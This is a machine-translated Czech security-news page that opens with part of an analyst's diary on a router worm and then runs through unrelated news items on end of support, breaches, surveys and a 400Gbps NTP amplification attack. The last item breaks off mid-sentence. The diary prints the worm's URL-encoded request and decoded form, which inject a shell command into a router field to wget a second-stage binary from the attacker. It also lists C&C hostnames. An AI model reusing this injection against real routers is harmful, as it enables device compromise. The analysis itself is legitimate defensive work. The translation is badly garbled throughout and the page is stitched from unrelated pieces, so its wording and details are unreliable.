% 5d% 3b% 74% 68% 65% 6e% 20% 77% 67% 65% 74% 20% 68% 74% 74% 70% 3A% 2F% 2F% xx% xx% 2e
% Xx% xx% xx% 2e% xx% xx% xx% 2e% xx% xx% xx% 3a% 31% 39% 33% 2f% 30% 52% 78% 2e% 6d% 69
% 64% 3b% 66% 69% 60 &% 53% 74% 61% 72% 74% 45% 50% 49% 3d% 31
Dekódovaný verze této žádosti:
submit_button = & change_action = & submit_type = & action = & commit = 0 & ttcp_num = 2 & ttcp_size = 2
& Ttcp_ip =-h
`Cd / tmp, pokud [! .-E L26], pak wget http:// [zdroj IP]: 193/0Rx.mid; fi `
& StartEPI = 1
Takže to vypadá, že se bude snažit stáhnout "druhou fázi" z portu 193 z útočícího routeru. Soubor ". L26" Zdá se, že soubor zámek, aby se zabránilo vícenásobné využití.
Jsem srážkové úplnou adresu URL pro teď, dokud můžu zjistit, jestli tam je oprava, nebo jestli je to veřejná / známý využít.
Port Zdá se změní, ale je vždy <1024. Druhá etapa Binární si vždy tři písmena a pak "náhodný" rozšíření.
Zde jsou MD5s některých dvojhvězd jsem načtených tak daleko. Jsou ELF binárky. Pokud by někdo chtěl pomáhat při jejich couvání, prosím, kontaktujte mě na vzorku.
d9547024ace9d91037cbeee5161df33e 0dQ.png
a85e4a90a7b303155477ee1697995a43 Dsn.raw
88a5c5f9c5de5ba612ec96682d61c7bb EXr.pdf
ef19de47b051cb01928cab1a4f3eaa0e Osn.asc
Typ souboru: ELF 32-bit LSB executable, MIPS, na MIPS I verze 1 (SYSV), staticky propojeny, zbavený
Budu aktualizovat tento deník trochu blow-by-ránu, jako i já jsem stále zvrátit části druhé etapy.
- Binární obsahuje sadu těžké kódovaných netblocks (/ 24 a / 21), které by mohly bloky skenuje.
- Existují i napevno jména dyndyn.org hostitele. Nejste si jisti, ale to, co oni jsou (C & C?): Azlan281.dyndns.org, littlefrog.dyndns.org, charinalg06.dyndns.org, xplunk.dyndns-home.com a více.
- Jen na základě "řetězce", přesto to vypadá, že tam je velení a řízení využití kanálu na zprávu o stavu hostitele.
- Seznam uživatelských agentů:
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: 1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)
Mozilla/2.0 (compatible; MSIE 3.0b, Win32)
Mozilla/4.0 (compatible; MSIE 4.01, Mac_PowerPC)
Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0;. NET CLR 1.0.3705)
Mozilla/4.0 (compatible; MSIE 6.0, Win32) WebWasher 3.0
Mozilla/4.0 (compatible; Opera/3.0, Windows 4.10) 3.51 [en]
Mozilla/5.0 (compatible; Konqueror/2.2.2, Linux 2.4.14-xfs, X11, i686)
Mozilla/5.0 (compatible; SnapPreviewBot, en-US; rv: 1.8.0.9) Gecko/20061206 Firefox/1.5.0.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit / xxx.x (KHTML like Gecko) Safari/12x.x
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv: 1.0.1) Gecko/20030306 Camino/0.7
Opera/9.60 (Windows NT 5.1; U; de) Presto/2.1.1
Opera/9.0 (Windows NT 5.1; U; en)
Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686, U ;) Gecko/20011224
Opera/6.x (Linux 2.4.8-26mdk i686, U) [en]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3
Mozilla/5.0 (X11; Linux i686, U, rv: 1.7.13) Gecko/20070322 Kazehakase/0.4.4.1
- Seznam serverů bannerů:
Apache/2.2.9 (Fedora)
Apache/1.3.3 (Unix) (Red Hat / Linux)
Apache/1.3.23
Microsoft-IIS/5.0
Nginx
Microsoft-IIS/5.1
Netscape-Enterprise/4.1
Microsoft-IIS/6.0
Apache/2.2.24 (Amazon)
Sun-ONE-Web-Server/6.1
Microsoft-IIS/7.5
IBM_HTTP_Server
Rozšíření a mediální typy používané pro druhé fázi souborů:
application / pdf
. Pdf
image / png
image / gif
Gif.
image / jpeg
. Jpg
image / bmp
. Bmp
image / tiff
. Tif
audio/ac3
. Ac3
audio / asc
. Asc
audio / ogg
. Ogg
audio / midi
. Mid
audio / mpeg
. Mpg
video / mpeg
video / avi
. Avi
video / raw
. Surovin
Binární je spojeno proti OpenSSL, tak C & C kanál použít SSL.
Binární také obsahuje několik obrázků (díky Peter za ukázal, že mimo). Datum vytvoření snímků je 09.5.2013. Zdá se, že loga identifikující autora? Existuje celkem 5 obrázků PNG. 3 smajlíky a 2 loga. Jsem včetně větší loga níže. Existuje celá řada strun s odkazy na "Lunar", "měsíc", "planety", které se zdají být použit jako součást C & C kanálu.
Odkaz na "Lunar Industries" a logem Zdá se, že odkaz na film "Moon" http://www.imdb.com/title/tt1182345/
Nejen Windows XP: Končí i podpora MS Office 2003
13.2.2014 Zranitelnosti
Ačkoliv riziko plynoucí z neaktualizovaného kancelářského balíku je menší než v případě operačního systému, i konec bezpečnostních aktualizací MS Office 2003 je pro zákazníky důležitý.
Windows XP nejsou jediným masově používaným softwarem Microsoftu, jehož podpora se blíží ke svému konci. Spolu s ním bude 8. dubna 2014 vydán poslední balíček záplat také pro MS Office 2003 a MS Exchange 2003.
Absence další nabídky bezpečnostních oprav není ani v případě kancelářského balíku zanedbatelná. Mnohé útoky se provádějí právě přes soubor ve formátu kancelářské aplikace, který je umístěn na webový server nebo zaslán e-mailem.
Analytici Wes Miller ze společnosti Direction a Michael Silver z Gartneru se shodují, že Office 2003 a Windows XP sdílejí v mnoha podnicích společný osud, proto by se konec podpory Office 2003 neměl podceňovat. Windows XP se výrazněji uchytily po vydání Service Packu 2 zhruba ve stejné době, jako přišel na trh MS Office 2003. Podniky pak obvykle přeskočily následující aktualizaci, tedy Vista a Office 2007. Příčinou byla (kromě samotného aktualizačního cyklu) i spokojenost s předcházejícími verzemi softwaru, rozpačité přijetí Windows Vista i ribbonů (pásů karet) v MS Office 2007.
Každopádně tak MS Office do značné míry následuje přijetí Windows. Firmy obvykle přecházely z Windows XP na Windows 7, podobně z MS Office 2003 na verzi 2010. Stejně tak rozpačité je v podnicích zase přijetí Windows 8 i Office 2013.
Oba analytici, Millet a Silver, se ovšem liší v odhadu, nakolik se v prostředích s přetrvávajícími Windows XP provozuje i MS Office 2003. Silver usuzuje, že to bude asi 30-40 %, Millet hádá více. Přesné statistiky k dispozici nejsou, protože penetrace operačních systémů se zjišťuje především při návštěvách webu, kdy se identifikuje prohlížeč, OS pod ním a plug-iny browseru, nikoliv však ostatní aplikace. Další rozbory mají nicméně naznačovat, že kritika ribbonů postupně odeznívala, takže některé firmy aktualizovaly dříve kancelářskou sadu než operační systém. (Mimochodem, Julie Larson-Greenová, která měla v Microsoftu hlavní podíl na volbě ribbonů, je nyní odpovědná mj. za tablet Surface.) Faktem také je, že Windows XP mnohdy přetrvávají nikoliv na klasických PC, ale na vestavěných (embedded) systémech, včetně např. bankomatů.
Ačkoliv riziko plynoucí z neaktualizovaného kancelářského balíku je menší než v případě operačního systému, i konec bezpečnostních aktualizací MS Office 2003 je pro zákazníky důležitý, vždyť v roce 2013 bylo pro tuto verzi určeno 10 bulletinů zabezpečení. Pokud tedy zákazníci chtějí software nadále používat, měli by udělat alespoň několik základních úprav, například zakázat makra.
Nakonec nelze zapomenout ani na to, že současně končí podpora „back-endu“, tedy serveru MS Exchange 2003. I zde se aktualizační cyklus v podnicích podobal Windows a MS Office, tedy vynechána byla verze Exchange 2010 a ve větší míře se upgradovalo až na verzi 2010. Exchange 2003 byl obvykle instalován na Windows Server 2003, který bude podporován do roku 2015. Zde může upgrade být spojen s další komplikací: Windows Server 2003 byl ještě k dispozici i ve 32bitové verzi, následující serverový software již jen jako 64bitový. V některých případech se přechod na vyšší verze proto možná odkládal (odkládá) kvůli hardwaru.
Hackeři porušení poštovní servery Comcast
12.2.2014 Incident
Po úspěšném cílení Bell Canada a úniku informací o zákaznících, hacker kolektivní NullCrew zřejmě porušil poštovní servery, které patří do Comcast, největší ISP v USA.
Tvrdí, že využili místní začlenění souboru (LFI) Chyba zabezpečení v Zimbra, groupware e-mailový server a webový klient použít na 34 Comcast poštovních serverů, aby jim a jejich přístup k obsahu. Aby dokázal, že jejich "vítězství", které souvisí s Pastebin příspěvek obsahuje seznam serverů, a využívat kódu, které zřejmě použitý v útoku. Databreaches.net hlásí , že příspěvek nezahrnoval informace o zákaznících, i když jeden z útočníků znamenal , že se dostali do rukou databázi hesel. Comcast ještě vyjádřit k tvrzení, ale zdá se, že se snaží ochránit své poštovní servery z dalších útoků se, že zneužití kódu je veřejná tím je zrušit v současné době.
Cílové útočníci zneužít síťových pověření společnosti HVAC
12.2.2014 Kriminalita
Zdroje blízké vyšetřování Target porušení pojmenovali dodavatele třetí strany, jehož síťová pověření útočníci použít k získání přístupu k systému TARGET v systému. Dotčená společnost je Fazio Mechanical Services, chlazení a HVAC (topení, ventilace a klimatizace) poskytovatel se sídlem v Sharpsburg, Pennsylvania. "Není to okamžitě jasné, proč by Cílová dali společnost HVAC externí přístup k síti, nebo proč, že přístup by neměl být ohraničena kordonem ze sítě platebního systému TARGET je. ale podle odborníka kybernetické bezpečnosti na velké prodejce, který si nepřál být jmenován, protože neměl oprávnění mluvit o záznamu, to je obyčejné pro velké maloobchodní operace, které mají tým, který pravidelně monitoruje spotřebu energie a teploty v obchodech ušetřit na nákladech (zejména v noci) a upozornit obchod manažeři, pokud teploty v obchodech se pohybují mimo přijatelném rozsahu, který by mohl zabránit zákazníky od nakupování v obchodě, " uvádí Brian Krebs. "Na podporu tohoto řešení, prodejci musí být schopen dálkově do systému s cílem provést údržbu (aktualizace , skvrny, atd.), nebo potíží s závady a problémy s připojením se softwarem, "vysvětlil zdroj. generální ředitel společnosti v otázce se nevyjádřil k otázce, kromě tím, že byly navštívil americkou tajnou službou v připojení k vyšetřování. další podrobnosti odhalené o porušení, je, že útočníci začali nahrávat POS malware 15. listopadu, a na konci tohoto měsíce, většina zařízení POS cílových byly ohroženy. údaje slurping začal 27. listopadu, a trvala až do prosince 15 a ukradl informace byly exfiltrated přes FTP na počtu serverů umístěných v Rusku, USA, Brazílii a dalších zemích. Ve světle těchto nových odhalení, otázka je, co teď pokuty Target bude muset zaplatit, protože to nesplní pravidla ochrany nařízené podle aktuálního odvětví platebních karet Data Security Standard.
HTTPS Everywhere add-on je nyní k dispozici pro Firefox na Android
12.2.2014 Bezpečnost
Electronic Frontier Foundation (EFF), oznámila vydání beta verze jeho HTTPS Everywhere rozšíření pro Firefox na Android. HTTPS Everywhere se vyrábí jako spolupráce mezi The Tor Project a Evropského rybářského fondu. Prodloužení přepíše všechny požadavky na místa z HTTP HTTPS, kdykoliv je to možné - tedy v případě, že webová stránka podporuje HTTPS na prvním místě - a tím zvýšení bezpečnosti uživatelů a soukromí. Až teď, to bylo k dispozici pouze pro desktopové verze Firefoxu, Chrome a Opera. "Mnoho stránek na nabídku webové některé omezenou podporu pro šifrování přes HTTPS, ale je obtížné používat. Například, oni mohou výchozí nešifrované HTTP, nebo vyplňte šifrované stránky s odkazy, které jdou zpět do nešifrované stránky ", EFF vysvětluje. "Jak nosit naše telefony a tablety, často se připojit k unfamilar WiFi sítí, uvedení své osobní údaje v nebezpečí, že budou sledovány, shromažďovány, a hrál si s někým jiným ve stejné síti, stejně jako poskytovatelé internetových služeb, provozovatelů sítí, a vládních agentur, " oni poznamenal s tím, že HTTPS Everywhere chrání proti působení těchto útoků. Jakmile je nainstalován, můžete vidět, že rozšíření se pracuje při pohledu na jeho ikonu na pravé straně adresního řádku:
Jedním kliknutím na ikonu umožňuje zapnout a vypnout. Zatímco toto je vítanou zprávou pro uživatele Android, iPhone a iPad mohou uživatelé nemohou doufat, že mít možnost využít tohoto rozšíření. "Je nám líto, že nemůžeme vám pomohou zabezpečit váš mobilní prohlížení webu. politika Apple zamykání z Mozilly znamená, že nemůžete mít více bezpečný prohlížeč v kapse, "EFF Parker Higgins a Yan Zhu vysvětlil.
Dospělí přiznat, že přihlášení do svých partnerů sociálních médií účtů
12.2.2014 Sociální sítě
Nový výzkum ukazuje, že jeden ze čtyř Britů bude odeslání drzý zprávu nebo fotku na své druhé poloviny. Nicméně, milovníci chtít myslet dvakrát před zasažením pošlete je na intimní obsahu, varuje poskytovatel internetových security, McAfee, jenž dnes zveřejnila výsledky svého "láska, vztahy a technologie" zprávy.
Studie odhaluje, více než polovina (55%), Britů, kteří odeslaných nebo přijatých intimní nebo sexuálně explicitní obsah, ještě je uložen na svém mobilním zařízení, a to navzdory skutečnosti, že jeden ze tří (31%), nemají ani tu nejzákladnější ochranu heslem na jejich smartphonů. Z těch, které mají ochranu proti 42% používá stejné informace pro více internetových připojených zařízení, čímž se zvyšuje pravděpodobnost, že tato zařízení budou hacknutý. Britové byli také odhalil, že příliš důvěřivý osobní informace, jako 34% z dotázaných sdílel osobní hesla se manžel nebo významný jiný, a 96% důvěřuje své druhé poloviny, že nebudete posílat důvěrné zprávy nebo sexts on-line. Nicméně i přes tuto důvěru 45% dotázaných se přiznala k přihlašování do svých partnerů sociálních nebo app profilů pomocí své heslo slídění na obsah odeslaných a přijatých. "V této době" vždy "spotřebitelů, pravidla kolem soukromí v datování ztratil některé sociální potence. Téměř polovina dotázaných se probírat privátních online účtů partnera, což snooping všední událost. V době, kdy sdílení obsahu s tisíci může trvat několik sekund, riziko osobního obsahu úniku on-line nikdy nebyla vyšší, a zda partner je důvěryhodný, nebo ne, že je životně důležité chránit sebe a své zařízení "komentoval Samantha Swift, on-line bezpečnosti . Expert, McAfee " Andy Jones, expert vztah a bývalý datování publicista řekl zjištění: "Žijeme v nemorální době, kdy celebrity Sexting skandály jsou dvě penny a patentky soukromých částí těla jít virové přes noc. Za každou úniku médií, od prince Harryho neslavný noci v Las Vegas na Scarlett Johansson nahé selfies, je smartphone. Jsme generace žijící s digitálním zavazadel, zda jste obětí hack nebo mstivý milence, obrázky unikly on-line vydrží po celý život. Digitální Daters musíte se dostat moudré e-etikety a začít chránit jejich online pověst. Jako orientační pravidlo, pokud je to něco, co byste nechtěli, aby vaše rodina vidět asi neměl sdílejte ji! " McAfee radí spotřebitelům, aby sdílení hesel nebo kódů pro mobilní zařízení s ostatními, které pomohou udržet osobní obsah v bezpečí. Mobilní uživatelé se rovněž vyzývají, aby nepoužíval slabá hesla, která lze snadno určit jako jsou narozeniny, čísla v řadě a opakovat čísla pro své zařízení. Spíše šestimístná hesel a slov převést na čísla pomocí mobilního klávesnice jsou silnější a měla by být využívána. Další nálezy z této studie patří: Ne soukromí v digitálním roku 20% Britů dotázaných přiznala k užívání svého partnera mobilní vidět, jaký typ fotografií nebo zpráv bylo na něm, což bylo nejčastější u žen, s přibližně čtvrtina (24%) ze všech žen přiznává, dívat se skrz zařízení svého partnera. Mezitím muži jsou více pravděpodobné, že tajně zkontrolovat e-mailové nebo sociální účty jejich partnera, protože 50% se přiznal k přihlášení na sociální profily médií svého manžela nebo významný jiný, zatímco 35% se kontrolovat své e-maily. Celkově 58% mužské činnosti bylo provedeno v tajnosti. Youth jsou nejvíce vystaveny riziku Když to přišlo k zasílání sexts a explicitní obsah mladší generace byly nejaktivnější a umístění se na největší riziko expozice, 38% ve věku 18-24 let přijat na posílání sexts nebo explicitní obsah, zatímco pětina (21%) z 25 až 34 rok věku byl, pokud jde o natáčení sexuální obsah videa na svém mobilním zařízení pryč. Výzkum také ukázal, že explicitní obsah je větší pravděpodobnost, že budou sdíleny v méně formálně stanovených vztahů, 49% respondentů poslal sexts a intimní zprávy na přítele nebo přítelkyně, zatímco 31% ji poslal příteli, že "hook-up s" a 13% sdílený obsah s úplně cizí. To je ve srovnání s 24%, který ji poslal na manžela nebo manželku. Ex etiketa když dotázaných jasně důvěřovat svým partnerům v mezích vztahu, pokud tento vztah se porouchá riziko digitální odplata stoupá. Výzkum ukazuje, že jeden z pěti (20%) sdílela heslo s ex, zatímco 73% změnilo, že heslo na rozbití a více než čtvrtina (27%) se neobtěžoval, takže se otevřený digitální snooping. Když přišlo na explicitní obsah, jen 14% mužů a 35% žen požádal tohoto obsahu je třeba odstranit na konci vztahu. Ačkoli akty pomsty nebyly hojné, 7% respondentů hledal pomstychtivou žalobu na ex pomocí vlastní obsah.
Efektivní reakce na incidenty
12.2.2014 Incidenty
Organizace jsou bombardováni s potenciálními hrozbami každý den. Většina z nich jsou malé a dráždivé, a to opravdu kritická - ale mezi ty jehly jsou malé závity větších akcí při práci. Program reakce na incidenty umožňuje vytáhnout jehly, které tvoří kupce sena velký obrázek, podle Jaime Blasco, ředitel v AlienVault Labs.
Klikněte zde pro kompletní Infographic
Konečným cílem programu na reakce událost je nejen účinně obsahovat jednu událost, ale na začátek modelování techniky útoku. Odpověď Incident je založen na přístupu, který detekuje a uvádí kroky, které útočníkovi dovolit ohrozit bezpečnost systému. tým reakce na incidenty pak použije tyto informace pro řízení budoucích činností reakce na incidenty. V tomto modelu chování, které se mohou zdát neškodné před analýzou mohou sloužit jako prediktivní ukazatel většího útoku. Budování rámec je reakce na incidenty umožňuje organizaci, aby v obrovské množství podniků a bezpečnosti dat, budování vztahů mezi těmito daty a prezentovat ji v jediném sjednoceném postupu. Tento pracovní postup představuje jak obchodní a technické informace v jediném zobrazení. Analytici mohou trávit mnohem méně času učení jednotlivých ovládacích bezpečnostní technologie a mnohem více času analyzovat, najít vzory, a rozhodování reakce. Klíčové pojmy k úspěšnému programu reakce na incidenty, jsou následující:
Zákon o to, co se vám podaří-spustit na to, co víte, jak účinně reagovat.
Neexistuje často používaný bezpečnostní politiku, který pracuje pro organizaci po celou dobu, mimo zákonných požadavků. Nezapomeňte, obchodní procesy definovat politiku, ne naopak.
Sledování bezpečnosti je zásadní a základním prvkem každého programu reakce na incidenty.
Jak už název napovídá, reakce na incidenty zahrnuje reakci na některých ukazatelů o skutečném nebo potenciálním výskytem ukazatelů, které jsou zjištěny na základě sledování bezpečnosti. Indikátory jsou kontextové informace čerpány z řady technických a administrativních zdrojů.
Každé dvě sekundy je tu nová obětí podvodného zneužití totožnosti
12.2.2014 Kriminalita
Javelin Strategy & Research hlásí nárůst o více než 500.000 obětí podvodů na 13,1 milionu lidí v roce 2013. Účet podvod převzetí hit nový rekord ve výskytu pro druhý rok v řadě, a tvořily 28 procent všech podvodného zneužití totožnosti. Kromě toho, podvodníci stále obrátil na eBay, PayPal a Amazon se ukradené informace, aby nákupy. V roce 2013, porušení dat se staly více škodlivé, s jedním ze tří lidí, kteří dostávali data narušení oznamovací dopis stává obětí podvodného zneužití totožnosti. Povzbudivé je, že částka, kterou zločinci ukradl snížil o 3 mld. dolarů na $ 18, což odráží další agresivní akce od finančních institucí, poskytovatelů ochrany proti krádeži identity a spotřebitelů. Identity podvod je definováno jako neoprávněné použití osobních údajů jiné osoby k dosažení nedovoleného finanční zisk. Identity podvod se může pohybovat od jednoduše pomocí účtu ukradené platební karty, k tomu, aby podvodné nákup, na převzetí kontroly stávajících účtů nebo otevření nových účtů, včetně mobilního telefonu nebo inženýrských sítí. V říjnu 2013 Javelin Strategy & Research provedla adresa bázi Průzkum z 5634 amerických spotřebitelů identifikovat důležité poznatky o dopadu podvodů, odhalit oblasti pokroku a identifikovat oblasti, ve kterých musí spotřebitel uplatnit pokračující bdělosti. další oběti, méně ukradené - počet identifikačních incidentů podvodů zvýšil o 500 tisíc spotřebitelů v uplynulém roce , zatímco částka v dolarech ukradl snížila až 18 miliard dolarů, což výrazně nižší, než je nejvyšší za celou dobu 48 miliard dolarů v roce 2004. Ti mezi 35-44 byly v největší riziko. V případě úspěchu, podvodníci jsou nyní více než třikrát vyšší pravděpodobnost, použít peníze ukradené koupit předplacené nebo dárkové karty, aby podvodné nákupy. Typy podvodů změnil - účet převzetí vzrostl dramaticky - Zločinci se mění chování zneužít zranitelnosti. Většina výmluvně, účet převzetí hit nový rekord ve výskytu pro druhý rok v řadě, a tvořily 28 procent identity ztrát podvodů. Účet převzetí za služby a mobilní telefon podvody téměř ztrojnásobil, protože podvodníci přidat nové vlastnosti, které inženýrských účty obětí a vyběhnout neoprávněných poplatků za použití "prémii" textových služeb. Spotřebitelé, které jsou obětí účtu převzetí tendenci začít platit účty on-line ke zlepšení bezpečnosti. Datové porušení jsou největším rizikovým faktorem pro zneužití cizí identity - V roce 2013, jeden ze tří spotřebitelů, kteří obdrželi oznámení o porušení dat, se stal obětí podvodu. To je až z jedné na čtyři v roce 2012. Čtyřicet šest procent spotřebitelů s porušené debetní kartou v roce 2013 se stal obětí podvodu ve stejném roce, ve srovnání s pouze 16 procent spotřebitelů se číslo sociálního zabezpečení porušena. Identity podvod je víc než jen podvody s kreditními kartami - Konkrétně, podvody non-karet došlo k rychlému nárůstu v roce 2013. Počet obětí podvodu non-karet téměř ztrojnásobil, a to činil 5 miliard dolarů podvodu. Tento podvod zahrnuje: ohrožena úvěrové linky, internetové účty (např. na eBay) a e-mailové platební účty, jako je PayPal.
Jak akce Edward Snowdena je ovlivněn dodavatele obranných
12.2.2014 Šifrování | Bezpečnost | Ochrana
Nová studie ThreatTrack Security vrhá světlo na postoje velmi exkluzivní skupinu IT a bezpečnostní manažery - ti zaměstnán dodavatelů Spojených států obrany - v době, kdy národní kybernetické je pod kontrolou.
75% respondentů uvedlo, že Edward Snowden událost změnila kybernetické praktiky svých firem na jednom z následujících způsobů:
55% uvádí, že jejich zaměstnanci nyní získat více školení o kybernetické
52% přezkoumala nebo přehodnotit přístup k datům práva zaměstnanců
47% jsou na vyšší pohotovosti pro neobvyklé síťové aktivitě ze strany zaměstnanců
41% zavedly přísnější najímání
39% uvádí, že byly omezeny jejich vlastní práva pro správu IT.
63% respondentů držet buď tajné, přísně tajné nebo důvěrné vůle. Nicméně, z těch, kteří mají přístup k, nebo obchod důvěrné informace, 27% nemají takové vůle. To představuje potenciální privilegovaný přístup problém, kde může mít snadný přístup k citlivým vládních údajů zaměstnanců dodavatelských bez těchto vůlí se. Kromě odhaluje, jak se jejich bezpečnostní postupy se změnily ve světle Edward Snowden incidentu, Průzkum také zkoumal předměty, například zda narušení bezpečnosti osobních údajů jsou hlášeny, co nejobtížnější aspekty kybernetické obrany je, zda starší lídři v dodavatelských organizací jsou infikovány malwarem vzhledem k rizikovému chování online, zda vláda poskytuje správné vedení a podporu pro kybernetické obrany, a zda dodavatelé se obávají, že jejich organizace mohou být ohroženy sofistikovaných kybernetických hrozeb. Průzkum zjistil, vysokou úroveň důvěry ve vládní poradenství o tom, jak chránit citlivá data. 88% respondentů se domnívá, že dostanou, co potřebují, pokud jde o podporu na tomto poli. Nicméně, 62% stále hlásil, že se jedná o jejich organizace je citlivá na apts, cílených útoků škodlivého softwaru a sofistikované počítačové kriminality a cyber-špionáže taktiky. dva nejtěžší aspekty bránit proti pokročilým malware byly hlášeny být objem malware útoků (61 % uvedlo, že tomu tak bylo) a složitost tohoto malware (59%). Další 29% řekl, že není dost rozpočet správnými nástroji, a 22% uvedlo, že prostě nemají přístup k automatizovaným malware analýzy řešení, které dokáže detekovat a sanaci nejvíce sofistikovaných hrozeb v reálném čase. "Je to zajímavé, na vědomí, že zatímco Armádní dodavatelé Zdá se, že lepší bezpečnostní postupy v místě a jsou více transparentní než mnoho společností v soukromém sektoru, které zjišťují aktuální cyber ohrožení nápor stejně obtížné řešit, "řekl prezident ThreatTrack Bezpečnost a generální ředitel Julian Waits, Sr "Více než polovina se obává, že jsou citlivé na cílené útoky a kybernetické špionáže, a vzhledem k druhu údajů, které jsou manipulace a skladování, myslíme si, že číslo musí dostat mnohem menší -. a rychle" 26% respondentů uvedlo, že je zde nedostatek vysoce kvalifikovaných bezpečnostních pracovníků (malware analytiků) na zaměstnance. Předchozí studie ukázaly, že tento nedostatek je ještě umocněn tím, že IT bezpečnostní personál je běžně multi-tasking mezi novým malware analýzy vzorků - což obvykle trvá více než 2 hodiny na vzorek -. A čištění malware vypnutí přístroje manažery " I když mnohem zodpovědnější než jejich protějšky v soukromém sektoru, v následujících ceny, obrana dodavatel IT manažeři odhalil přístroj používaný člen jejich vrcholového vedení týmu se stal napaden škodlivým softwarem kvůli vedení:
Návštěva pornografické webové stránky (13%) - ve srovnání s 40% v jiných podniků
Kliknutím na škodlivý odkaz v e-mailu phishing (40%) - ve srovnání s 56% v jiných podniků
Povolení člen rodiny používat firemní-vlastnil zařízení (14%) - v porovnání s 45% v jiných podniků.
Studie také odhalila mnohem více transparentnosti o narušení dat v obranných dodavatelských organizací než v běžné podnikové komunitě. Pouze 8% uvedlo, že si byli vědomi, že došlo k porušení dat v jejich společnosti, které nebyly hlášeny k zákazníkům, partnerům a vládních agentur, s nimiž smlouvu. To ve srovnání s 57% malwaru analytiků v podnikových prostředích, kteří uvedli, že byli vědomi porušení, které bylo nahlášeno. nezávislé slepé průzkumu 100 / manažerů IT bezpečnosti nebo zaměstnance v rámci obrany dodavatelských organizací, které se zabývají údaje pro americkou vládu bylo provedeno Stanovisko věcech jménem ThreatTrack bezpečnosti z listopadu 2013 do ledna 2014.
Nejisté sdílení souborů staví firemní data v ohrožení
12.2.2014 Bezpečnost
Osobní e-mail může být 2014 je největší hrozbou pro firemní data. Nový průzkum z více než 500 odborníků od GlobalSCAPE zjistil, že v posledních 12 měsících, 63 procent zaměstnanců se používají osobní e-mail Poslat citlivých pracovních dokumentů. Snad více překvapující, 74 procent z těch zaměstnanců věří, že jejich společnosti schválit tohoto typu chování, sdílení souborů.
Hrozba spotřebitele stupně metod přenosu souboru sahá daleko za využití zaměstnanců osobního e-mailu. Za posledních 12 měsíců:
63 procent zaměstnanců se používá dálkový zařízení pro ukládání dat, jako jsou USB disky, pro přenos důvěrných pracovní soubory
45 procent zaměstnanců jsou použity spotřebitelské lokalit, jako je Dropbox a Box.net pro citlivé obchodní informace sdílet
30 procent zaměstnanců se používá pro ukládání cloud služby pro soubory související s prací.
"Miliony zaměstnanců se aktivně pomocí nástrojů pro spotřebitele-stupně, stejně jako osobní e-mail, sociální média, a sdílení souborů stránek, přesunout důvěrné pracovních souborů každý den," řekl James Bindseil, prezident a generální ředitel společnosti GlobalSCAPE, vývojář bezpečné výměny informací, řešení . "I když záměrem je obvykle neškodné, mohou tato opatření mají vážné zabezpečení a dodržování předpisů důsledky." spoléhání Zaměstnanci na nářadí spotřebitel-grade přenášet soubory, není izolovaný problém. Téměř polovina všech zaměstnanců sledovaných přenos pracovních souborů prostřednictvím nezabezpečených kanálů ( Vzdálené úložiště, osobní e-mail, cloud storage, nebo místa spotřební přenos souborů), několikrát týdně. "Zjistili jsme, že 80 procent zaměstnanců dotazovaných, které používají osobní e-mail pro přenos citlivých pracovních souborů to alespoň jednou za měsíc," říká Bindseil . "Ještě děsivější: téměř třetina z této skupiny, ví o tom, že jejich osobní e-mail byl hacknutý alespoň jednou - a přesto i nadále, aby informace o společnosti v ohrožení." IT oddělení se snaží vytvářet účinné politiky pro sdílení informací a vzdělávání zaměstnanců o rizicích používání nezabezpečených kanálů. Podle průzkumu GlobalSCAPE je pouze 47 procent zaměstnanců si myslí, že společnosti, které pracují pro zavedou zásady pro zasílání citlivých souborů. Téměř třetina odpověděla, že to tam bylo žádné politiky na svém místě, a 22 procent nebylo jistý. prosazování politiky je také chybí. zaměstnanců ve firmách, které mají politiky pro zasílání citlivých souborů, 54 procent nadále používat osobní e-mail, a 62 procent stále používat vzdálená zařízení. "potřebuje sdílení informací z dnešní pracovní síly se rychle vyvíjí, a většina organizací se nedaří držet krok, "říká Bindseil." Zaměstnanci potřebují a očekávají okamžitý přístup k informacím a schopnost posílat a ukládat soubory pouhým stisknutím tlačítka. Když se vnitřní technologie a nástroje přijít krátká, budou zaměstnanci najít . řešení " I když existuje mnoho důvodů, proč zaměstnanci najít alternativy k jejich nástrojů přenosu souborů společnosti-za předpokladu, že největší řidiči jsou jednoduchost a snadnost použití Podle průzkumu GlobalSCAPE je.:
52 procent uvedlo, že je výhodnější použít nástroj, který dobře znají
33 procent uvedlo, že příjemci měli potíže s přístupem soubory zaslané prostřednictvím systému společnosti
18 procent uvedlo, že používají alternativy, protože nástroj společnosti nenabízí mobilní přístup.
"Rychlost, jednoduchost a mobilní přístup je kritický," řekl Bindseil. "Pokud podniky mají nějakou naději na správu a zabezpečení citlivých dat opouštějí jejich organizaci, které je třeba poskytnout řešení, které se snadno integrují do každodenní rutiny svých zaměstnanců."
400Gbps NTP bázi DDoS útok zasáhne Cloudflare
12.2.2014 Počítačový útok
Matthew Prince, generální ředitel Obsah dodávky sítě Cloudflare, se potvrdil na Twitteru v pondělí, že jeden z jeho zákazníků byl určen s velmi velkým Network Time Protocol (NTP) reflexe útoku - "větší, že Spamhaus útok z minulého roku. "
Neměl jméno zákazníka, ale má společné, že útok dosáhl úrovně více než 400 gigabitů za sekundu, to je pravděpodobně způsobeno dopravní zácpy na některých peering burzách (především v Evropě), který (na základě údajů vzorku) je zneužita jen více než 4500 nesprávně nakonfigurovaných serverů NTP, a že zákazník původně chtěl zaplatit ukradenou kreditní kartou. Navzdory doporučení vydané US-CERT o aktualizaci veřejných směřující NTP servery na ntpd verzi, která neumožňuje útočníci je použít pro NTP zesílení útoků, stále existuje mnoho zranitelných tam. "Útok se opírá o využívání" monlist "funkci NTP, jak je popsáno v CVE-2013-5211, která je ve výchozím nastavení povolena na starších NTP-schopné zařízení. Tato příkaz způsobí, seznam posledních 600 IP adres, které připojených k NTP serveru, který bude odeslán na oběti, "vysvětluje US-CERT. "Vzhledem k tomu, falešnou zdrojovou adresu, když NTP server odešle odpověď je poslán místo toho oběť. Protože velikost odezvy je obvykle podstatně větší než žádost, útočník je schopen zesilovat objem dopravy zaměřené na oběti. Navíc, protože odpovědi 